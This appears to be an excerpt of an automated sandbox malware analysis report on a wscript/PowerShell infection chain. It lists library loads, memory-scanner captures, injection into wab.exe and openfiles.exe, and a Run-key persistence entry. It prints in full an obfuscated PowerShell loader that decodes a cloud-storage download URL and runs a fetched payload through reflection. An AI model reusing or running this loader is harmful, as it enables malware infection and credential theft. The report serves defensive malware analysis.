        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: atl.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mscoree.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: version.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: amsi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: userenv.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wldp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: profapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msisip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wshext.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: appxsip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: opcservices.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: gpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: secur32.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: napinsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: pnrpnsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wshbth.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: nlaapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: iphlpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mswsock.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: dnsapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: winrnr.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: fwpuclnt.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rasadhlp.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe, Section loaded: wininet.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe, Section loaded: iertutil.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe, Section loaded: sspicli.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe, Section loaded: windows.storage.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe, Section loaded: wldp.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe, Section loaded: profapi.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe, Section loaded: kernel.appcore.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe, Section loaded: ondemandconnroutehelper.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe, Section loaded: winhttp.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe, Section loaded: mswsock.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe, Section loaded: iphlpapi.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe, Section loaded: winnsi.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe, Section loaded: urlmon.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe, Section loaded: srvcli.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe, Section loaded: netutils.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe, Section loaded: dnsapi.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe, Section loaded: fwpuclnt.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe, Section loaded: rasadhlp.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe, Section loaded: schannel.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe, Section loaded: mskeyprotect.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe, Section loaded: ntasn1.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe, Section loaded: msasn1.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe, Section loaded: dpapi.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe, Section loaded: cryptsp.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe, Section loaded: rsaenh.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe, Section loaded: cryptbase.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe, Section loaded: gpapi.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe, Section loaded: ncrypt.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exe, Section loaded: ncryptsslp.dll
        Source: C:\Windows\SysWOW64\openfiles.exe, Section loaded: mpr.dll
        Source: C:\Windows\SysWOW64\openfiles.exe, Section loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\openfiles.exe, Section loaded: version.dll
        Source: C:\Windows\SysWOW64\openfiles.exe, Section loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\openfiles.exe, Section loaded: netutils.dll
        Source: C:\Windows\SysWOW64\openfiles.exe, Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\openfiles.exe, Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\openfiles.exe, Section loaded: wininet.dll
        Source: C:\Windows\SysWOW64\openfiles.exe, Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\openfiles.exe, Section loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\openfiles.exe, Section loaded: ieframe.dll
        Source: C:\Windows\SysWOW64\openfiles.exe, Section loaded: iertutil.dll
        Source: C:\Windows\SysWOW64\openfiles.exe, Section loaded: netapi32.dll
        Source: C:\Windows\SysWOW64\openfiles.exe, Section loaded: userenv.dll
        Source: C:\Windows\SysWOW64\openfiles.exe, Section loaded: winhttp.dll
        Source: C:\Windows\SysWOW64\openfiles.exe, Section loaded: wkscli.dll
        Source: C:\Windows\SysWOW64\openfiles.exe, Section loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\openfiles.exe, Section loaded: wldp.dll
        Source: C:\Windows\SysWOW64\openfiles.exe, Section loaded: profapi.dll
        Source: C:\Windows\SysWOW64\openfiles.exe, Section loaded: secur32.dll
        Source: C:\Windows\SysWOW64\openfiles.exe, Section loaded: mlang.dll
        Source: C:\Windows\SysWOW64\openfiles.exe, Section loaded: propsys.dll
        Source: C:\Windows\SysWOW64\openfiles.exe, Section loaded: winsqlite3.dll
        Source: C:\Windows\SysWOW64\openfiles.exe, Section loaded: vaultcli.dll
        Source: C:\Windows\SysWOW64\openfiles.exe, Section loaded: wintypes.dll
        Source: C:\Windows\SysWOW64\openfiles.exe, Section loaded: dpapi.dll
        Source: C:\Windows\SysWOW64\openfiles.exe, Section loaded: cryptbase.dll
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe, Section loaded: wininet.dll
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe, Section loaded: mswsock.dll
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe, Section loaded: dnsapi.dll
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe, Section loaded: iphlpapi.dll
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe, Section loaded: fwpuclnt.dll
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe, Section loaded: rasadhlp.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptdlg.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msoert2.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptui.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msftedit.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: explorerframe.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: actxprxy.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
        Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\msftedit.dll
        Source: Window Recorder Window detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
        Source: C:\Windows\SysWOW64\openfiles.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000009.00000002.1926528931.00000000008E8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbD9%m! source: powershell.exe, 00000009.00000002.1939448940.00000000081E9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: wab.exe
        Source: Binary string: stem.Core.pdb source: powershell.exe, 00000009.00000002.1938944597.0000000008184000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbb: source: powershell.exe, 00000009.00000002.1939448940.00000000081E9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wab.pdbGCTL source: NJeXDhPqkKUqTApfiOc.exe, 00000012.00000002.2755874529.00000000025CC000.00000004.00000001.00040000.00000000.sdmp
        Source: Binary string: wab.pdb source: NJeXDhPqkKUqTApfiOc.exe, 00000012.00000002.2755874529.00000000025CC000.00000004.00000001.00040000.00000000.sdmp

        Data Obfuscation

        Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("POWERSHELL.exe", ""$Ricki = 1;$Gehenna='Substrin';$Gehenn", "", "", "0");
        Source: Yara match File source: 00000009.00000002.1940984455.000000000965B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000009.00000002.1940563125.00000000084A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.2059655451.000001FCED5D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000009.00000002.1930663126.00000000057E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Trlbinde)$global:Acren = [System.Text.Encoding]::ASCII.GetString($indecipherable)$global:Diakonaterne=$Acren.substring(295638,29219)<#Vedholdende Histologien Pasteuriserendes Stretch
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Takningers161 $Erhvervsrets $Tropein), (Isbaadenes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Aeroelastic = [AppDomain]::CurrentDomain.GetAssemblies()
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Plirede230)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Indlggelse, $false).DefineType($Euklidisk, $St
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Trlbinde)$global:Acren = [System.Text.Encoding]::ASCII.GetString($indecipherable)$global:Diakonaterne=$Acren.substring(295638,29219)<#Vedholdende Histologien Pasteuriserendes Stretch
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. 
.lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st p
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. 
.lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st p
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF8879900BD pushad ; iretd 3_2_00007FF8879900C1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887997954 push ebx; retf 3_2_00007FF88799796A
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202109AD push ecx; mov dword ptr [esp], ecx 12_2_202109B6
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_02A056DD push dword ptr [ebx+edx*8]; ret 12_2_02A056E3
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_02A037CC push edi; ret 12_2_02A03806
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_02A02A0A push es; retf 12_2_02A02A0C
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_02A0384E push edi; ret 12_2_02A03806
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_02A0498C push cs; ret 12_2_02A0498F

        Boot Survival

        Source: C:\Windows\SysWOW64\openfiles.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run -PVHSLDXBF
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
        Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2028D1C0 rdtsc 12_2_2028D1C0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF887993BFB sldt word ptr [eax]3_2_00007FF887993BFB
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3943Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5893Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5353Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4377Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 0.3 %
        Source: C:\Windows\System32\wscript.exe TID: 6248Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 748Thread sleep time: -5534023222112862s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5916Thread sleep count: 5353 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5916Thread sleep count: 4377 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4324Thread sleep time: -5534023222112862s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exe TID: 1668Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\openfiles.exeLast function: Thread delayed
        Source: wscript.exe, 00000000.00000003.1587636884.0000023238D46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.O
        Source: wscript.exe, 00000000.00000003.1587421505.0000023238BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: wscript.exe, 00000000.00000003.1587421505.0000023238BF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
        Source: wscript.exe, 00000000.00000003.1587198761.0000023236DAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1588971000.0000023236E3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
